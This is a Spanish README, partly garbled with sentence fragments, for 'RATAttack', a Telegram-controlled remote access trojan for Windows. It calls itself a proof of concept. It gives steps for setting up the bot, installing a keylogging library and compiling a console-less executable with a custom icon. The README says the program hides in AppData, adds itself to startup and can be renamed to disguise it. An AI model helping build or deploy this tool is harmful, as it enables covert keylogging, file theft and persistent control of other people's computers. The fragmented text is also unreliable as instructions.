
Herramienta de post-explotación remota para Windows vía Telegram
Herramienta de Post-Intrusión Remota para Windows vía Telegram (Python 2.7), Creada originalmente por Ritiek, bifurcada y modificada por mvrozanti y luego por mí mismo.
El propósito principal de esta herramienta es demostrar (como una "PoC") el control de una máquina ya comprometida, a través de Telegram. Al igual que con mis herramientas ya escritas, no promuevo actividades ilegales.
Esta versión modificada utiliza la API v2 de Telegram Bot, en lugar de la tradicional v1. El cambio principal son los botones de teclado en lugar de escribir texto. Intentaré agregar nuevas funciones, corregir errores y ser compatible con la API v3, después de agregar los cambios necesarios de "mvrozanti". Mientras tanto, los comandos cd, download, upload, run y delete no funcionarán.

file al bot de Telegram.Las herramientas actuales de Administración Remota en el mercado enfrentan 2 problemas principales:
Este RAT supera ambos problemas al utilizar la API de Telegram Bot.
BotFather.pip install -r requirements.txt.64 bits o 32 bits según tu sistema.
pip install pyHook-1.5.1-cp27-cp27m-win_amd64.whl.pip install pyHook-1.5.1-cp27-cp27m-win32.whl.python RATAttack.py.chat_id desde la consola y reemplázalo en el script y comenta la línea return True. No te preocupes, lo sabrás cuando leas los comentarios en el script.
RATAttack en tu directorio de trabajo que contiene y cualquier archivo que subas al bot.Reemplaza tu ruta en compileAndRun.bat (ejecutar esto realmente ejecutará el ejecutable)
Ejecuta `pyinstaller --onefile --noconsole C:\ruta\a\RATAttack.py`. También puedes pasar `--icon=<ruta\a\icono.ico>` para usar un icono personalizado.
.exe en C:\Python27\Scripts\dist\. Puedes cambiar el nombre del .exe a lo que desees..exe compilado, el script se ocultará e infectará tu PC para que se ejecute al inicio. Puedes volver a la normalidad usando la opción /self_destruct o eliminando manualmente el directorio C:\Users\Username\AppData\Roaming\Portal y C:\Users\Username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\portal.lnk (aunque recomiendo eliminarlos manualmente por ahora)..exe oculto y la ubicación y nombre de la carpeta donde el .exe oculto se esconderá. Para ello; modifica compiled_name y hide_folder respectivamente.The MIT License
keylogs.txt